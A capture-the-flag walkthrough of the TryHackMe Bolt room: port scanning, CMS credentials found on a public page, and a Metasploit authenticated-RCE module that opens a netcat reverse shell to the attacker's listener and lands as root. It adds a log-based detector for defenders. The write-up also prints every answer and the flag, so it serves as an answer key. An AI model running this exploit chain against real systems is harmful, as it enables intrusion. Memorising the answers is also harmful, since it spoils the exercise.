In this walkthrough we go through the Bolt room from TryHackMe. The room covers exploitation of the Bolt CMS through an authenticated remote code execution vulnerability, and it expects basic enumeration skills and familiarity with an exploitation framework such as Metasploit. So, let's get started.
Machine Info:
| Title | Bolt |
| IP address | 10.10.236.41 |
| Difficulty | Easy |
| Objective | This room is designed for users to get familiar with the Bolt CMS and how it can be exploited using authenticated remote code execution. You should wait at least 3-4 minutes for the machine to start properly. |
Task 1 – Deploy the machine
Task 2 – Hack your way into the machine!
Question 1 – What port number has a web server with a CMS running?
- We start with a regular nmap scan, using the flags for a half-open SYN scan and service/version detection. A SYN scan needs raw-socket privileges, so run it with sudo or as root.
wh1terose@fsociety:~$ nmap -sS -sV 10.10.236.41
Host is up (0.24s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open     http    (PHP 7.2.32-1)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.45 seconds
8000
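As an added example that is not part of the original walkthrough, here is a small Python parser over nmap's normal output. It picks out the ports that are open and fingerprinted as HTTP, which is the shortlist of places a CMS can live, and turns them into URLs to browse. The scan output is embedded inline as constructed sample input (copied from the scan above); the function names are the example's own.

```python
import re

# Constructed sample input: the nmap normal output from the scan above, one port per
# line as nmap prints it, so the parser can be exercised offline.
NMAP_OUTPUT = """\
Nmap scan report for 10.10.236.41
Host is up (0.24s latency).
Not shown: 996 closed ports
PORT     STATE    SERVICE VERSION
22/tcp   open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp   filtered domain
80/tcp   open     http    Apache httpd 2.4.29 ((Ubuntu))
8000/tcp open     http    (PHP 7.2.32-1)

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 48.45 seconds
"""

# One port line of nmap's normal output: "<port>/<proto> <state> <service> [<version>]".
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)(?:\s+(?P<version>.*))?$"
)


def parse_nmap(text):
    """Return one dict per port line, in the order nmap printed them."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if not m:
            continue  # banner, summary and header lines are skipped
        entry = m.groupdict()
        entry["port"] = int(entry["port"])
        entry["version"] = (entry["version"] or "").strip()
        ports.append(entry)
    return ports


def web_ports(text):
    """Ports that are open (not filtered/closed) and identified as HTTP-speaking."""
    return [
        p["port"]
        for p in parse_nmap(text)
        if p["state"] == "open" and p["service"].startswith("http")
    ]


def http_targets(host, text):
    """URLs to open in a browser for each web port, dropping the explicit :80."""
    return [
        f"http://{host}/" if port == 80 else f"http://{host}:{port}/"
        for port in web_ports(text)
    ]


if __name__ == "__main__":
    for p in parse_nmap(NMAP_OUTPUT):
        print(f"{p['port']}/{p['proto']:<4} {p['state']:<9} {p['service']:<7} {p['version']}")
    print("web targets:", http_targets("10.10.236.41", NMAP_OUTPUT))
```

Port 53 is reported as filtered rather than open, so it is correctly left out of the web shortlist; the two remaining candidates are the Apache instance on 80 and the bare PHP service on 8000, and the version column is what tells them apart.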
Question 2 – What is the username we can find in the CMS?
- Explore the web application on port 8000.
bolt
Question 3 – What is the password we can find for the username?
- Navigating to the following URL reveals the password for the user bolt; it sits in a public entry on the site.
http://<Machine IP>:8000/entry/message-for-it-department
boltadmin123
Question 4 – What version of the CMS is installed on the server? (Ex: Name 1.1.1)
- The following URL is the login page of the Bolt CMS. Logging in to the dashboard with the credentials found above shows the CMS version at the bottom of the page.
http://<Machine IP>:8000/bolt/login
Bolt 3.7.1
Question 5 – There’s an exploit for a previous version of this CMS, which allows authenticated RCE. Find it on Exploit DB. What’s its EDB-ID?
- Search for known exploits against Bolt 3.7.1. The search turns up an Exploit DB entry for an authenticated remote code execution exploit against Bolt 3.7.0; the Metasploit module used in the next step targets the same issue, and its automatic check confirms that this 3.7.1 install is affected as well.
48296
Question 6 – Set the LHOST, LPORT, RHOST, USERNAME, PASSWORD in msfconsole before running the exploit
Done
Question 7 – Look for flag.txt inside the machine.
- Use the Metasploit module bolt_authenticated_rce to get a shell and read the flag. Note that the session lands directly as root: the service on port 8000 (which nmap fingerprinted as bare PHP rather than Apache) is running as root, so no privilege escalation is needed. The module also cleans up after itself, deleting the .php file it dropped under /files and restoring the profile it modified.
msf6 > use exploit/unix/webapp/bolt_authenticated_rce
[*] Using configured payload cmd/unix/reverse_netcat
msf6 exploit(unix/webapp/bolt_authenticated_rce) > show targets

Exploit targets:
=================

    Id  Name
    --  ----
    0   Linux (x86)
    1   Linux (x64)
=>  2   Linux (cmd)

msf6 exploit(unix/webapp/bolt_authenticated_rce) > show options

Module options (exploit/unix/webapp/bolt_authenticated_rce):

   Name                 Current Setting        Required  Description
   ----                 ---------------        --------  -----------
   FILE_TRAVERSAL_PATH  ../../../public/files  yes       Traversal path from "/files" on the web server to "/root" on the server
   PASSWORD                                    yes       Password to authenticate with
   Proxies                                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                                      yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                8000                   yes       The target port (TCP)
   SSL                  false                  no        Negotiate SSL/TLS for outgoing connections
   SSLCert                                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI            /                      yes       Base path to Bolt CMS
   URIPATH                                     no        The URI to use for this exploit (default is random)
   USERNAME                                    yes       Username to authenticate with
   VHOST                                       no        HTTP server virtual host

   When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http:

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   SRVHOST  0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local machine or 0.0.0.0 to listen on all addresses.
   SRVPORT  8080             yes       The local port to listen on.

Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   2   Linux (cmd)

View the full module info with the info, or info -d command.
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set LHOST 10.18.11.103
LHOST => 10.18.11.103
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set USERNAME bolt
USERNAME => bolt
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set password boltadmin123
password => boltadmin123
msf6 exploit(unix/webapp/bolt_authenticated_rce) > set RHOSTS 10.10.236.41
RHOSTS => 10.10.236.41
msf6 exploit(unix/webapp/bolt_authenticated_rce) > exploit

[*] Started reverse TCP handler on 10.18.11.103:4444
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target is vulnerable. Successfully changed the /bolt/profile username to PHP $_GET variable "jnayvn".
[*] Found 3 potential token(s) for creating .php files.
[+] Used token 0f1630df2cf71d71dbdd805609 to create ncwepzlb.php.
[*] Attempting to execute the payload via "/files/ncwepzlb.php?jnayvn=`payload`"
[!] No response, may have executed a blocking payload!
[*] Command shell session 1 opened (10.18.11.103:4444 -> 10.10.236.41:58902) at 2023-05-12 22:01:49 +0530
[+] Deleted file ncwepzlb.php.
[+] Reverted user profile back to original state.

id
uid=0(root) gid=0(root) groups=0(root)
ls
index.html
cd /root
ls
cd /home
ls
bolt composer-setup.php flag.txt
cat flag.txt
THM{wh0_d035nt_l0ve5_b0l7_r1gh7?}
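The module run above leaves a recognisable trail on the target: a POST to /bolt/profile, then a GET for a freshly created .php file under /files with the command in a query parameter, after which the file is deleted and the profile restored. Because the dropped file is gone by the time anyone looks, the web server access log is the main artefact a defender has. The following Python detector is an added example, not part of the original walkthrough and not Metasploit code. It assumes Apache combined-format access logs (the room's port-8000 service is a bare PHP server whose console log has a different shape, so the line regex is the part to adapt); the log lines are constructed samples modelled on the run above, with the file and parameter names taken from it and the client address and timestamps made up.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import urlsplit

# Constructed sample log (Apache combined format) modelled on the module run above.
# Lines 1-4 are one client authenticating, editing its profile and calling the dropped
# script; line 5 is a benign upload being served; line 6 is an unrelated probe.
ACCESS_LOG = """\
10.18.11.103 - - [12/May/2023:22:01:40 +0530] "GET /bolt/login HTTP/1.1" 200 5120 "-" "Mozilla/5.0"
10.18.11.103 - - [12/May/2023:22:01:41 +0530] "POST /bolt/login HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.18.11.103 - - [12/May/2023:22:01:45 +0530] "POST /bolt/profile HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.18.11.103 - - [12/May/2023:22:01:48 +0530] "GET /files/ncwepzlb.php?jnayvn=id HTTP/1.1" 200 0 "-" "Mozilla/5.0"
198.51.100.7 - - [12/May/2023:22:05:10 +0530] "GET /files/2023-05/photo.jpg HTTP/1.1" 200 83211 "-" "Mozilla/5.0"
203.0.113.9 - - [12/May/2023:22:07:02 +0530] "GET /files/old/info.php HTTP/1.1" 404 196 "-" "curl/7.68.0"
"""

# Apache combined format: client, ident, user, [timestamp], "METHOD target PROTO", status, size, ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)
# Extensions the PHP handler would execute if a file with that name landed under /files.
SCRIPT_EXT = (".php", ".phtml", ".phar", ".php5", ".php7")


def parse_log(text):
    """Parse combined-format lines into dicts with a timezone-aware timestamp."""
    events = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        url = urlsplit(m["target"])
        events.append({
            "ip": m["ip"],
            "ts": datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"),
            "method": m["method"],
            "path": url.path,
            "query": url.query,
            "status": int(m["status"]),
        })
    return events


def is_script_in_uploads(ev):
    """Bolt serves uploaded content from /files; nothing there should be a script."""
    return ev["path"].startswith("/files/") and ev["path"].lower().endswith(SCRIPT_EXT)


def find_alerts(text, window=timedelta(minutes=5)):
    """Flag script requests under /files; escalate when the same client edited its
    profile shortly before and the script answered 200, i.e. the sequence the module
    printed (profile username -> .php under /files -> GET with a parameter)."""
    events = parse_log(text)
    alerts = []
    for ev in events:
        if not is_script_in_uploads(ev):
            continue
        profile_edit = any(
            e["ip"] == ev["ip"]
            and e["method"] == "POST"
            and e["path"] == "/bolt/profile"
            and timedelta(0) <= ev["ts"] - e["ts"] <= window
            for e in events
        )
        severity = "high" if profile_edit and ev["status"] == 200 else "medium"
        alerts.append({
            "ip": ev["ip"],
            "path": ev["path"],
            "query": ev["query"],
            "status": ev["status"],
            "severity": severity,
        })
    return alerts


if __name__ == "__main__":
    for a in find_alerts(ACCESS_LOG):
        print(f"[{a['severity']}] {a['ip']} {a['path']}?{a['query']} -> {a['status']}")
```

The 404 probe from the third client is still reported at medium severity, because a scanner asking for PHP under the upload directory is worth knowing about even when nothing is there; only the combination of a recent profile edit and a successful script execution from the same address is rated high, which matches what the module actually did against this host.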
Conclusion:
So that was it. We just completed the "Bolt" room. To summarize: we started with our usual nmap scan and found a web server on port 8000 running the Bolt CMS. Exploring the web application revealed the username and password for the backend. Logging in with those credentials gave us the version of the CMS. Searching that version for known public exploits turned up an authenticated RCE for version 3.7.0. Running the corresponding Metasploit module gave us a root shell, and with it the final flag for the room.